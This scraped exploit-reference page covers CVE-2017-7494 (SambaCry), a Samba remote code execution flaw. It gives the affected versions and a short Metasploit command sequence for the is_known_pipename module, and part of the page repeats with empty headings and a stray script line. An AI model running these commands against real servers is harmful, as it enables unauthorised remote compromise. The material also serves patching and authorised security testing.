.. / CVE-2017-7494

Exploit for Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - Remote Code Execution (SambaCry, CVE-2017-7494)

Description:

Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.

Affected Products:

Samba 3.5.0 < 4.4.14
Samba 4.5.0 < 4.5.10
Samba 4.6.0 < 4.6.4

Metasploit Module

Exploit with Metasploit

use exploit/linux/samba/is_known_pipename
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
run

References:

https://nvd.nist.gov/vuln/detail/CVE-2017-7494
https://www.samba.org/samba/security/CVE-2017-7494.html
https://github.com/iagox86/metasploit-framework-webexec/blob/master/documentation/modules/exploit/linux/samba/is_known_pipename.md

.. / CVE-2017-7494 if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

Exploit for Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - Remote Code Execution (SambaCry, CVE-2017-7494)

Description:

Affected Products:

Metasploit Module

Exploit with Metasploit

.. / CVE-2017-7494